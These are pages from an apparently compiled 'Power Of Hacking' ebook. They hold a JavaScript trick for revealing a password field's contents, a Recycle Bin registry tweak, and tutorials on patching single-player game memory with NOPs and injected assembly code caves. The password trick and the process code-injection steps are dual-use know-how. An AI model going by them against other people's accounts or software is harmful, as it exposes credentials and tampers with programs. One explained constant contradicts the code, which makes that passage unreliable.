Page 137


Power Of Hacking速 Don't forget to attach your link to the post (you can chance the image, there are two options, one is the application screenshot, the other is the pig. The pig usually sells better). You can also, instead of attaching a link, attach a picture! Each Sunday, if you got more than 10$ in your affiliate balance, you will receive an affiliate payment in your paypal! This guide took me a lot of hours to make it and im sharing this method with you for free! Enjoy it!! Reveal *****(Asterisk) Passwords Using Javascript :Want to Reveal the Passwords Hidden Behind Asterisk (****) ? Follow the steps given below1) Open the Login Page of any website. (eg. http://mail.yahoo.com) 2) Type your 'Username' and 'Password'. 3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'. javascript: alert(document.getElementById('Passwd').value); 4) As soon as you press 'Enter', A window pops up showing Password typed by you..! Note :- This trick may not be working with firefox. How To Rename Your Recycle Bin 1. Click Start / Run 2. Type regedit and press enter. 3. Open the HKEY_CLASSES_ROOT folder 4. Open the CLSID folder 5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder 6. Open the ShellFolder folder Mail:mtahirzahid@yahoo.com

Page 138


Power Of Hacking速 7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick and change value data to 0). You must change both of these values to get the rename to appear. After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.

Game Training Tutorial #1

Tutorial Nr. 1 Standard Game Training: Learning how to hack games.

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

Awem Blade Master v1.0

http://www.awem.com/blade_master/

This is #1 in a series of tutorials ... from hacking static addresses up to advanced game hacking.

Note, that this is a tutorial for beginners. People who already have experience in game training should skip this and continue with the next one.

What we will learn: In this tutorial we will learn how to search for exact values and work with static addresses. Mail:mtahirzahid@yahoo.com

Page 139


Power Of Hacking®

Our target is a game called Blade Master. There are more and other games, for which I could have done a tutorial, but Apache- gave me the idea of using this one, so I agreed, because its a shareware game (that means, you do not have to pay for it :P ) and its easy to train (especially for beginners).

LET'S GET IT ON

Start the program TSearch. This is our so called ‘Memory Searcher’. With this program, we are able, to find an ‘Address’ in our game, which is holding for instance our Life ‘Value’.

Now run our target game Blade Master. Start a New Game and choose Mission 1. As you can see in the lower right corner, we have 3 Lives. So after we have died the 3rd time, we would see a nasty screen, saying us that we are Game Over. But of course we want to have infinite lives, to play the whole game without this stupid screen popping up.

Pause the game, and press Alt-Tab, to go back to TSearch. In TSearch click Open Process and then on blademaster.exe. You have now chosen the process which you want to hack, so lets start:

STARTING THE FIRST SEARCH

Mail:mtahirzahid@yahoo.com

Page 140


Power Of Hacking® Click on the magnifying glass, to start a new search. As we all know, 3 is an exact value so we will use the search for an ‘Exact Value’. We have 3 Lives and that's the ‘Value’ we want to find.

We know that 3 is less than 255 so we make a search for a ‘1 Byte’ value. Start the search. Well, after my first search I have found almost 300.000 addresses.

We could of course try to change them all to 20 or whatever, but the game would most probably crash, if we do so, not to mention that it would take much time :P

What we have to do now, is searching for our lives, but another value than 3 ... ok, let's go back to the game and loose all your Health until you die. Our life value has now decreased by 1, so we have a total life amount of 2. Pause the game again and go back to TSearch. As you know we have just searched for 3 lives and TSearch has found all addresses which could be our life address. So let us search for 2 now. Click on the magnifying glass with the three ...'s.

Hmm, still too much addresses left, don't you think? Let's loose another life. Search for 1 in TSearch. Well, 11 addresses left here, but we have another life which we could loose, so after an enemy has killed you again and you have 0 lives left, search for it.

Oki, 2 addresses left. Now we still have to kill one of these two addresses. Abort your Mission, and start it again, so that you have 3 lives again and you will most certainly see the correct address we need in TSearch. Here its 1196FDC ... double-click it to Mail:mtahirzahid@yahoo.com

Page 141


Power Of Hacking® transfer it to the right (to the CheatTable) of TSearch. My TSeach screen would now look like this:

DESCRIPTION

ADDRESS

VALUE

TYPE

Lives

1196FDC

3

1 Byte

But well, we have only 3 lives and these are definitely not enough. There are now 2 ways to get infinite lives. The first and easiest would be to ‘Freeze’ the value in address 1196FDC.

STARTING THE FIRST ‘HACK’

Do you see the square to the left of the description Lives? Click it and a green face will appear. This means, that you have frozen the value and it will not change, even if you are loosing a life. Go back to the game and try it ... you will see, that you always have the same amount of lives left which you have frozen.

The other way would be to set the life value to 50 or 99 or maximal 255 (because we've set it to 1 Byte). Well, I know you will not have ‘infinite’ lives then, but if 255 is still not enough for you, you can change the Byte Type to 4 Bytes and then change the value to 999.999.999 ... I think that should be enough :P

THE END

Well, as you of course know these are ‘Static’ addresses. This means that the Mail:mtahirzahid@yahoo.com

Page 142


Power Of Hacking速 addresses will not change when you start a new level or restart the game. What you can do now in TSearch is saving the Cheat File and when you want to play the game again, you can load it and you will still have the correct life address.

Well ... I think this the end of the tutorial. As I said this is only basic stuff but this is what its supposed to be, coz its for beginners :P I hope you have managed everything and learned from it.

I suggest you now to download a few more shareware games and try to hack them. This will give you the general idea of how to make easy hacks and finding correct addresses, etc.

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

Mail:mtahirzahid@yahoo.com

Page 143


Power Of Hacking速 You are allowed to spread this tutorial to any sites as long as the content of the tutorial is exactly the same as the one available on http://mtahirzahid.blogspot.com

Game Training Tutorial #2

Tutorial Nr. 2 Standard Game Training: Learning how to defeat DMA - the easy way

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

Alien Abduction v1.2.0.0

http://www.reflexive.net/

What we will learn: In this tutorial we will learn, how to search for unknown values and defeat Dynamic Memory Allocation (DMA).

Our target is a game called Alien Abduction. This game is a very good for us to train, coz its using a fuel bar and DMA.

WHAT IS DMA?

As you may have noticed, there are games, which are changing the memory locations. That means, when you have found the address for lives and restart the game, the address has changed. Mail:mtahirzahid@yahoo.com

Page 144


Power Of Hacking®

Some games (nowadays almost every game) are using this method and every time you load the game or restart it, the game will give the memory locations to another available slot of memory. When you have restarted the game, you will have to make the search again, coz your old address is as useless as a second asshole :P But don't worry ... there is a way to get around this problem.

But keep in mind, that we are not able to change the allocation of the memory. What we have to do is to find the correct game code, which is for example decreasing our Health/Life and stop it from executing.

THE DEBUGGER

I know that there are more and better debuggers available, but we will use TSearch's. Its free, it’s easy to use and I think not everyone has the money to buy SoftIce (or should I say: Not everyone has ‘access’ to it :P ). We could also use OllyDbg, but I think for easy things like this, TSearch is suitable.

UNKNOWN VALUES

An unknown value is a value which we can't see at all. Example: When we run the game Alien Abduction we see, that we have 3 Lives. This is a known value because it is an exact digit. Mail:mtahirzahid@yahoo.com

Page 145


Power Of Hacking®

But when we look at the fuel in the game, we see that there isn't a given value but a fuel BAR. So when we have 100% fuel the value ‘could’ be 100 or 17902 or whatever, but we don't know it for sure.

THE SEARCH FOR THE UNKNOWN VALUE

This search method will obviously take a bit longer than the search for exact values because with this search we will search for ALL addresses in the memory. Start TSearch and run the game. Once you have started a new level, pause the game and go back to TSearch. Select the process AlienAbduction.RWG (Reflexive Arcade games are almost always using this type of file).Start a new search for an unknown value, Type: 4 Bytes.

After the search go back into the game, unpause it and watch the Fuel Bar decreasing. After it has decreased a few mm, pause the game again, go back to TSearch and continue the search with ‘Has decreased’ because we have just seen our fuel decreasing.

Some games are using different routines. On the game American McGee's Scrapland for instance, I have almost spent 2 hours of searching for the Infinite Ship Boost hack, until I had the idea, of searching the other way. So when the Ship Boost has decreased I have to search for has increased/etc … and it worked perfect ;)

Mail:mtahirzahid@yahoo.com

Page 146


Power Of Hacking® Anyways... after the first has decreased search, go back to the game, let the fuel decrease again and search. You will notice, that this search method will take a few minutes, to make it easier, you can also use the search for a value which has ‘not changed’.

You should do it like this: After the search for has decreased, go back to the game but do NOT resume it. Then (without doing anything) Go back to TSearch again and search for a value which `Has Not Changed'. This search would kill more addresses, when you resume the game, fly a bit around and kill a few enemies, but unfortunately the fuel will instantly decrease, when you resume the game.

Note, that you should always be careful that no enemy kills you, coz after you died, the memory will already be allocated to another location.

Ok, I have now 18 addresses left. To kill the other ones, the only thing I need, is to have a look at them :P There are addresses which are ‘linked’ together, for example 496D0B, 496D0C, 496D0D, 496D0E (in this case 496D0E would be the ‘mater’ address). When I change the value from address 496D0E, the linked addresses will change their values, too. Here are only 3 bunches of those addresses (note that this is not on every game the same). Transfer all these ‘master’ addresses to the CheatTable and freeze one after another and after you have found the correct one, delete the others. Mail:mtahirzahid@yahoo.com

Page 147


Power Of Hacking®

My fuel address is 93F5536 with value 214234 (your address will be different to 99,9%, but the value will probably be in the same range). After changing the value a bit I saw that the maximum value of fuel is 214331.

Well, as we know this address will change as soon as we restart the game. Now we need our debugger.

USING THE DEBUGGER

At the top of TSearch click on AutoHack, in the drop-down on Enable debugger and after that AutoHack window.

Now go to the TSearch main screen and right-click the fuel address and choose AutoHack (at the bottom). We have now set a ‘Breakpoint’ (it’s a WRITE breakpoint, btw) on our fuel address. When we go back to the game and the fuel value is changing, we will see something popping up in the TSearch's AutoHack window:

ADDRESS 4138CF

OPCODES

LANGUAGE

D996A4000000

FST DWORD PTR [ESI+0xA4]

Do you see it? You have exactly the same code. That's because this is the GAME CODE. This code is on EVERY computer the same.

There are of course exceptions (more about them in another tutorial), but I can Mail:mtahirzahid@yahoo.com

Page 148


Power Of Hacking® assure you to 100% that this code will always be the same on any computer you are using (At least as long as you use the same game version). The question is now: How are we supposed to hack this value? There no numbers we can write to get infinite fuel or to set the fuel value to max …

I will tell you what we have to do: We have to replace the instruction which is changing our Fuel (FST DWORD PTR [ESI+0xA4]) to something else, that isn't changing it.

Fortunately we have a friend called NO OPERATION (a.k.a. NOP). And our friend does exactly what he is called. When the game is executing the instruction which is changing our fuel and we have ‘nopped’ it, the fuel will not change.

NOP HACKS

As you know from the above code, FST DWORD PTR [ESI+0xA4] has 6 opcodes: D9-96-A4-00-00-00. We want to kill the whole instruction FST DWORD PTR [ESI+0xA4] so we have to kill ALL opcodes. The NOP opcode is 90 so we have to overwrite/poke NOP 6 times into the instruction we want to kill. Once back to the AutoHack window right-click the line

4138CF

D996A4000000

Mail:mtahirzahid@yahoo.com

FST DWORD PTR [ESI+0xA4]

Page 149


Power Of Hacking® and then ‘Nop This Line’. You will see 6 NOP's. One beneath the other. Go back to the game and resume it. Well done, you have now Infinite Fuel. You could also make this hack for Lives, Nukes, Crystals, etc.

THE REWARD

Now quit the whole game and run it again. Start TSearch, choose the process and click enable debugger and AutoHack window. There is a button in the AutoHack window called DIS or click on Edit and then on Disassemble. Write down the address 4138CF and you will see that its still there ;)

You have now learned how to make nop-hacks. With this knowledge you are able to defeat DMA on almost every game. As I have said earlier, this is only the easy way of how to defeat it. In the next tutorial you will learn how to do it with code injection.

Now I suggest you again to download other games and repeat what we have done. You should also start to learn assembler coz it is essential for our next tutorials, though I will explain a bit too. You should at least know what the different instructions like MOV, JMP (and all other JMP types), LEA, CMP, PUSH, etc. are doing.

Mail:mtahirzahid@yahoo.com

Page 150


Power Of Hacking速 Well then ... another tutorial finished. I hope you have managed everything and learned from it. Even people who already have loads of experience in game training are using this method to freeze values etc, so don't think this is only stuff for kids :P

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on --> iRC: EFNET: #GAMEHACKING

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com

Game Training Tutorial #3

Tutorial Nr. 3 Mail:mtahirzahid@yahoo.com

Page 151


Power Of Hacking® Standard Game Training: Learning how to defeat DMA – with code injection

Tools Needed: TSearch Alien Defense v1.0

http://mtahirzahid.blogspot.com http://www.reflexive.net

Sheep's Array of Sunshine v1.3

http://mtahirzahid.blogspot.com

What we will learn: In this tutorial we will learn how to defeat DMA with code injection.

Code Injection is used by advanced game hackers. The general idea is, that you jump out of the main game code to your OWN code and jump back, after your code has been executed. If you have good asm (Assembler) knowledge, you can do almost everything with it.

NEW TOOL

Today we will use Sheep's Array of Sunshine (a.k.a. SAS). With this little program, we can search our game code for unused locations, to inject our code.

It has quite a lot more functions, than you might think. You should read the included readme, to learn how to use this program and how to take advantage of it …

I’m using it since 2003 and I still hope that one time (hopefully in this century :P) Mail:mtahirzahid@yahoo.com

Page 152


Power Of Hacking® sheep will update it.

START

The game we will hack today is called Alien Defense. It’s another little shareware game and perfect to learn how to inject code.

Also note that you should have learned the basics of asm by now. (I have warned you in the previous tutorial :P)

First thing we need to do is to find the Health value. We could hack Shield as well, but for this part we will use Health..

I think the search you have to do is completely clear... if not:

Start TSearch, run the game, begin a mission, select the process AD.RWG in TSearch and start the search for an unknown value.

Go back to the game, decrease the Health, search again; decrease the Health, search again; decrease the Health, search again; and search for has not changed, to save a bit time…

I have found the address 294C57E (yours will be different to 99,9%).

Now there are two ways how we could do it ... The first would be to set a Memory Mail:mtahirzahid@yahoo.com

Page 153


Power Of Hacking® breakpoint on the address, the second would be to set a open breakpoint on it.

For this tutorial we will use the ‘normal’ Memory breakpoint ... we will see the advantage of the Open breakpoint in the next tutorial.

Now after you have found the correct address (the value should be in the range of 16384 and 17096 [depends on how much Health you have left]) set a breakpoint on it by enabling the debugger and right-clicking the address and AutoHack it.

I got:

ADDRESS

OPCODES

0040EDB3

D9597C

LANGUAGE FSTP DWORD PTR [ECX+0x7C]

What we will try to do now is this:

ADDRESS

OPCODES

0040EDB3

D9597C

0040EDB6

8BE5

MOV ESP,EBP

0040EDB8

5D

POP EBP

0040EDB9

C20400

00xxxxx0

OUR CODE HERE

00xxxxx4

OUR CODE HERE

Mail:mtahirzahid@yahoo.com

LANGUAGE FSTP DWORD PTR [ECX+0x7C]

--> we jmp to 1

--> 2

RETN 0x4

--> 1

Page 154


Power Of Hacking® 00xxxxx8

OUR CODE HERE

00xxxxxC

JMP 0040EDB8 --> and after our code has been executed we jmp to 2

What we here do is: We jump from our main game code – 0040EDB3 – to our code cave – 00xxxxx0 (this 00xxxxx0 is only because we haven't grabbed our code cave yet) – then we inject our own code and after the code has been executed, we will jump back to the main game code.

Well, we have to find out, which value we have to inject into [ECX+0x7C], right? Normally it would be 17096, because if you change your Health value to that, you would have full Health ... but not in this game

We have to find out the address of the register (ECX) and then add 7C to it. To do this right-click on the line 0040EDB3 D9597C FSTP DWORD PTR [ECX+0x7C] in the AutoHack window and then on Register.

Now go to the Register tab (it’s to the right of the Thread tab). Once there, you have to choose the register ECX in the dropdown list. Then click on the square to the left of the window, to activate it (you will see that it is activated by the red head that appears in the square.

Go back to the game and change the value (decrease the Health), pause again and go back to AutoHack. An address should now have appeared under ‘Original Value’. Here it is 294C500 Mail:mtahirzahid@yahoo.com

Page 155


Power Of Hacking® (yours will be different).

Go to TSearch again, then to View and Show Calculator (if you haven’t already activated it). Right to the equality sign there is a button called ‘H’ ... click on it to change it to ‘D’ Now we are in the Hex mode, coz everything we need to calculate is hex and not decimal.

Calculate your register address with 7C ... in this case it should be:

294C500 + 7C = 294C57C (you could have done it in your head, but I think you got the point)

Add this address to TSearch, 4Bytes. Change your Health value (address 294C57E here) to 17096 (that’s the value to get max Health) and you will see that the value in address 294C57C has changed to 1120403456. This is the value we need to inject into [ECX+0x7C] to get 100% health.

Now we will grab our code cave. Run SAS, select the process (the window name) and then on CODE CAVE FINDER. Have a look at the CODE CAVE RESULTS ... it should look like this:

SECTION

CODE CAVE START

CODE CAVE SIZE CHARACTERISTICS

.text

0043ACD2

32E

Read/Exec

.rdata

00440680

980

Read Only

Mail:mtahirzahid@yahoo.com

Page 156


Power Of Hacking® .data

00451CAC

354

Read/Write

.rsrc

00459AB0

350

Read Only

We will use the cave in the .data section of the game, because not every cave is suitable so I suggest you to always use the .data or another section with Read/Write characteristics.

Before we inject our code, let’s make sure that there is really no code flying around. Go to the AutoHack window and disassemble the address 00451CAC.

Well, here I see now that there is a bit code on address 00451CAB – inc dword ptr [eax] – gambling around so we should better scroll a few lines down.

I have chosen 00451CC1 ... you can see the opcodes are 00-00 and the asm code for that is ADD [EAX],AL --> this is unused code, so very good for us to inject our code in.

Now let’s begin …

INJECTING THE CODE

Go back to the TSearch main screen and click on View and then on EasyWrite (if you haven’t already activated it).

Mail:mtahirzahid@yahoo.com

Page 157


Power Of Hacking速 Click on the white letter thing, to make a new easy write option and write this in the upper section of the EasyWrite window, because this is for the option, when it is activated (ON):

OFFSET 00451CC1 FSTP DWORD PTR [ECX+0x7C] MOV DWORD PTR [ECX+0x7C],0x42C80000 MOV ESP,EBP JMP 0040EDB8

OFFSET 0040EDB3 JMP 00451CC1

Now I will tell you everything, this code does:

OFFSET 00451CC1

--> this is the address of our code cave

FSTP DWORD PTR [ECX+0x7C]

--> we re-create the 1st destroyed instruction

MOV DWORD PTR [ECX+0x7C],0x42C80000 --> we move our health to 100% 42C80000 is 1120403456 in hex (you can use TSearch's converter) MOV ESP,EBP JMP 0040EDB8

OFFSET 0040EDB3 JMP 00451CC1

--> we re-create the 2nd destroyed instruction --> we jump back to the main game code

--> this is the address of the main game code --> and from the main game code, we jump to our code cave

Mail:mtahirzahid@yahoo.com

Page 158


Power Of Hacking®

It is ALWAYS very important, that you re-create the instructions you’ve destroyed. If you ask why we have destroyed them; this is because of the jump to our code cave.

With this jump we will destroy 5 OPCODES but the line 0040EDB3 D9597C FSTP DWORD PTR [ECX+0x7C] has only 3 opcodes, so we have automatically destroyed the next instruction too, which is 0040EDB6 8BE5 MOV ESP,EBP.

After you have typed that in EasyWrite, click on OK and activate the option. Go back to the game, and you will see that when an enemy hits you, you will always have 100% health.

To see how this looks in Assembly Language with all the addresses and opcodes, go to AutoHack, click on Disassemble and write down the address 0040EDB3 and you will see:

ADDRESS

OPCODES

LANGUAGE

0040EDB3

E9092F0400 JMP 0x00451CC1

Right-click on this line and then click on Follow and you will see your code:

ADDRESS

OPCODES

Mail:mtahirzahid@yahoo.com

LANGUAGE Page 159


Power Of Hacking® 00451CC1

D9597C

FSTP DWORD PTR [ECX+0x7C]

00451CC4

C7417C0000C842

MOV DWORD PTR [ECX+0x7C],0x42C80000

00451CCB

8BE5

MOV ESP,EBP

00451CCD

E9E6D0FBFF

JMP 0x0040EDB8

Great, eh? Now we almost finished this tutorial. Go back to the EasyWrite Option, we have just created and you will see that there is also a section in the lower EasyWrite window. This is used to deactivate our option (OFF). Write this:

OFFSET 0040EDB3 FSTP DWORD PTR [ECX+0x7C] OFFSET 0040EDB6 MOV ESP,EBP

The only thing we do here is changing the game code ‘back to normal’. That means that the jump to our code cave will be overwritten by the original code, to disable the ‘Infinite Health’ hack.

OK then … another tutorial finished. I hope you have managed everything and learned from it. You are now able to defeat the DMA and inject your OWN code into the game code, which is very often used by advanced game hackers to make hacks you cannot do with ‘normal’ game training.

Mail:mtahirzahid@yahoo.com

Page 160


Power Of Hacking速 As always I suggest you to download more shareware games and practise what we have just done. Since the next tutorial will be a bit more complex you should prepare for it ;)

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com

Game Training Tutorial #4

Tutorial Nr. 4 Advanced Game Training: Learning how to make hacks for Player Only Mail:mtahirzahid@yahoo.com

Page 161


Power Of Hacking®

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

AirStrike 3D Operation W.A.T v1.65 http://www.divogames.com Sheep's Array of Sunshine v1.3

http://mtahirzahid.blogspot.com

What we will learn: In this tutorial we will learn how to make hacks for Player Only.

A new routine: As you may have noticed (you would probably only notice this when you have trained/hacked an iso game) a few games are using the same routine in the game code for the player AND the enemy and/or other things as well.

To explain it a bit more: Let’s say you want to hack the Health in a game. After you have found the address you set a memory breakpoint on it, you change the value (decrease the Health) and AutoHack gives you the address which is decreasing your Health. Then you nop the instruction, you go back to the game and you see that you have Infinite Health. But when you play a bit longer you notice that the enemies will have Infinite Health as well … That means that the game is using the same instruction for other things as well as to decrease your Health. As far as I know, there is only one shareware game, which is using the same routine to decrease the player AND the enemy health. Mail:mtahirzahid@yahoo.com

Page 162


Power Of Hacking®

And this game is called AirStrike 3D. Today this will be our target game.

START

Obviously we have to find the Health address first.

I think the search you have to do is completely clear... if not:

Start TSearch, run the game, begin a mission, select the process AirStrike3D.exe in TSearch and start the search for an unknown value.

Go back to the game, decrease the Health, search again; decrease the Health, search again; decrease the Health, search again; and search for has not changed, to save a bit time…

I have found the address 466355.

Now we will set a memory Breakpoint on it.

With a Memory Breakpoint, TSearch will show us every code which ‘writes’ to the address we have set a breakpoint on.

Enable the debugger and AutoHack the address. Go back to the game and decrease the Health. This line will pop up: Mail:mtahirzahid@yahoo.com

Page 163


Power Of Hacking®

ADDRESS

OPCODES

LANGUAGE

406197

D99E03010000

FSTP DWORD PTR [ESI+0x103]

This is the instruction which is changing our Health. Right-click it and then ‘Nop This Line’. Go back to the game and check it. Yes … when an enemy hits you, your Health will not be decreased. Play a bit around and try to kill some enemies. You will notice that you can’t kill them. That’s because you have just nopped an instruction, which is also used to change the enemy Health.

But still … this code is not useless to us … think about it … I will tell you later ;)

Hacking Health for Player Only

As you know, we have just set a Memory Breakpoint on the Health address (remember: With a Memory Breakpoint, TSearch will show us every code which ‘writes’ to the address we have set a breakpoint on).

We will now set an Open Breakpoint on it.

With an Open Breakpoint, TSearch will show us every code which either ‘reads’ or ‘writes’ to the address we have set a breakpoint on.

In the AutoHack window go to Edit and then Set BreakPoint and write down the Mail:mtahirzahid@yahoo.com

Page 164


Power Of Hacking® Health address (466355), Bpm size: 1 and set the Type to: Read/Write. Now click on Set and AutoHack should have constantly returned one address. Now go back to the game, unpause it but do NOT change the health. Make sure that there are no enemies shooting at you right now. Fly around for 2-3 seconds (remember: do NOT change the health), pause the game again and go back to AutoHack. The debugger returned 3 addresses, which are only READING the address.

ADDRESS 4066F2

OPCODES D98103010000

LANGUAGE FLD DWORD PTR [ECX+0x103]

41ACDA

D906

FLD DWORD PTR [ESI]

404629

D98203010000

FLD DWORD PTR [EDX+0x103]

Not even one of these three addresses is used by the computer. For our health injection we will use this one:

404629

D98203010000

FLD DWORD PTR [EDX+0x103]

Well … for our Infinite Health hack, we have to know which value we have to inject in [EDX+0x103]. Right-click the address in the disassembler window and click Register. Now go to the Register-Tab, choose the register EDX and click on the square to the left of the address. Go back to the game, unpause it, pause it, go back to AutoHack and you will see that an address has returned. Here it is 466250. Calculate this address with 103: 466250 + 103 = 466353. Add this address to TSearch’s CheatTable. When you have 100% Health, the value of address 466353 = 1137180672 Mail:mtahirzahid@yahoo.com

Page 165


Power Of Hacking® and that’s the value, which we will inject into *EDX+0x103+.

But this is not the only thing we will do in this tutorial … we will also use this one:

406197

D99E03010000

FSTP DWORD PTR [ESI+0x103]

to make a One Hit Kill hack (This is the instruction, which returned when we have set a memory breakpoint on the health address. It is changing both [player AND enemy Health]).

That’s the advantage when a game is using the same routine for the player and the enemy … we can make two hacks, though we have only searched for one address ;)

OK, now it’s time to grab our code cave. Run SAS, select the process (the window name) and then click on CODE CAVE FINDER. Have a look at the CODE CAVE RESULTS ... it should look like this:

SECTION

CODE CAVE START

CODE CAVE SIZE CHARACTERISTICS

.text

00430850

000007B0

Read/Exec

.rdata

00437CAE

00000352

Read Only

.data

01FBE364

00000C9C

Read/Write

.rsrc

02012398

00000C68

Read Only

The .data section has read/write characteristics, so we will use this one. In AutoHack disassemble the address 01FBE364 and scroll a few lines down, because we will Mail:mtahirzahid@yahoo.com

Page 166


Power Of Hacking® need the first lines for a few ‘other things’ … in a moment you will see what I mean. We will use address 01FBE380.

First we will make the One Hit Kill … (big thx to Veggy for the code snippet) … go to TSearch and make a new EasyWrite option. Write this in the upper box (I will explain everything more detailed later):

OFFSET 01FBE3A6 FSTP DWORD PTR [ESI+0x103] CMP BYTE PTR [1FBE36D],0x0 JE @BackToGame1 CMP BYTE PTR [1FBE370],ESI JE @BackToGame1 MOV DWORD PTR [ESI+0x103],0x00000000 @BackToGame1: JMP 0040619D

OFFSET 00406197 JMP 01FBE3A6 HEX 90

That was our One Hit Kill … now we will make the Infinite Health hack for Player Only. Write this in the upper box, but above the One Hit Kill code:

OFFSET 01FBE380 MOV DWORD PTR [1FBE370],EDX Mail:mtahirzahid@yahoo.com

Page 167


Power Of Hacking® CMP BYTE PTR [1FBE36B],0x0 JE @BackToGame MOV DWORD PTR [EDX+0x103],0x43C80000 @BackToGame: FLD DWORD PTR [EDX+0x103] JMP 0040462F

OFFSET 00404629 JMP 01FBE380 HEX 90

Now its time to explain you everything this code does. We will start with Infinite Health:

OFFSET 01FBE380 I think this is obvious … it’s our code cave. From here all our code will be executed.

MOV DWORD PTR [1FBE370],EDX OK, as I said, we will use the first few lines of the .data section for a few ‘other things’. This is one of these ’other things’. Here we move the player structure base into 1FBE370. We will need this for the One Hit Kill option because there we will compare if the player OR the enemy got hit. As you know the instruction 406197

D99E03010000

FSTP DWORD PTR [ESI+0x103]

decreases the player health as well as the enemy health. So when the player was hit, Mail:mtahirzahid@yahoo.com

Page 168


Power Of Hacking® EDX will have the player structure base and when the enemy was hit, it will have the enemy structure base. So after we have moved the PLAYER structure base into 1FBE370, we are able to compare it with the enemy structure base in our One Hit Kill option.

CMP BYTE PTR [1FBE36B],0x0 This is another one of these ’other things’. With this compare routine, we are able to compare if the option is ON or OFF. Since 1FBE36B is in our .data code cave, its standard code is 00 (ADD [EAX],AL). So when it is 00 the option is OFF. But when we inject 0001 (ADD [ECX],AL) into 1FBE36A, the option is ON.

JE @BackToGame After the cmp routine has been executed this instruction will jump back to the game, when the option is off. JE = Jump if Equal. That means if 1FBE36B is 00, the One Hit Kill is off and we have to jump back to the main game code. If 1FBE36B is 01, continue with the next instruction, which is:

MOV DWORD PTR [EDX+0x103],0x43C93334 Here we move the Health value to 100% (1137180672 = 43C80000 in hex).

@BackToGame: FLD DWORD PTR [EDX+0x103] JMP 0040462F We use the BackToGame routine to re-create the destroyed instruction and jump Mail:mtahirzahid@yahoo.com

Page 169


Power Of Hacking® back to the game after our code has been executed. Remember: CMP BYTE PTR [1FBE36B],0x0

JE @BackToGame

If 1FBE36B (Infinite Health) = OFF, we have to jump back to the game.

OFFSET 00404629 JMP 01FBE380 HEX 90 From the address 00404629 we jump to our code cave (01FBE380). We use the HEX 90 instruction (HEX 90 is the same as NOP), because with the jump to our code cave we have destroyed 5 bytes but the original instruction was 6 bytes long. So we have overwritten the destroyed 6 byte instruction with another 6 byte instruction. When we do not replace the original number of bytes, the game would probably crash.

Now for the One Hit Kill hack:

OFFSET 01FBE3A6 Same as above: It’s our code cave. From here all our code will be executed.

FSTP DWORD PTR [ESI+0x103] We re-create the destroyed instruction.

CMP BYTE PTR [1FBE36D],0x0 We compare if the option was activated or not (on or off =1 or 0]).

Mail:mtahirzahid@yahoo.com

Page 170


Power Of Hacking速 JE @BackToGame1 If the option has not been activated, jump back to the main game code.

CMP BYTE PTR [1FBE370],ESI Do you remember this line: MOV DWORD PTR [1FBE370],EDX in the Infinite Health code?: We move the player structure base into 1FBE370. And now we COMAPRE the base with the person (player or enemy) who got hit, with the player structure base, because if ESI is the same as 1FBE370, the PLAYER was hit and not the enemy, which means that we can:

JE @BackToGame1 Jump back to the main game code.

MOV DWORD PTR [ESI+0x103],0x00000000 If ESI WAS the enemy structure base, we can move the enemy health value to 0, so that we are able to kill the enemy with One Hit ;)

@BackToGame1: JMP 0040619D We use the BackToGame1 routine to jump back to the game. Remember: CMP BYTE PTR [1FBE36D],0x0

JE @BackToGame1

If 1FBE36D (One Hit Kill) = OFF, we will jump back to the game.

OFFSET 00406197 JMP 01FBE3A6 HEX 90 Mail:mtahirzahid@yahoo.com

Page 171


Power Of Hacking® Same as above: From the address 00406197 we jump to our code cave (01FBE3A6). We use the HEX 90 instruction (HEX 90 is the same as NOP), because with the jump to our code cave we have destroyed 5 bytes but the original instruction was 6 bytes long. So we have overwritten the destroyed 6 byte instruction with another 6 byte instruction. When we do not replace the original number of bytes, we would probably crash the game.

Phew … that was the code for the Infinite Health and One Hit Kill hack… Activate the option and go back into the game to test it! Well … not working, eh? Of course it does not work :P

Do you remember this line in the Infinite Health code?: CMP BYTE PTR [1FBE36B],0x0

And this line in the One Hit Kill code?: CMP BYTE PTR [1FBE36D],0x0

As I said earlier, here we are comparing, if the option is ON or OFF. And at the moment 1FBE36B and 1FBE36D are both 00, which means, that the options are off. To enable them, we have to inject 0001 into 1FBE36A and 1FBE36C. To do this, make a new EasyWrite option and write this in the upper box, to enable Infinite Health:

Mail:mtahirzahid@yahoo.com

Page 172


Power Of Hacking® OFFSET 1FBE36A ADD [ECX],AL

And to deactivate the Option write this in the lower box:

OFFSET 1FBE36A ADD [EAX],AL

Do the same for the One Hit Kill option (make a new EasyWrite option and write the same code in the upper and lower box). You only have to change the offsets to 1FBE36C.

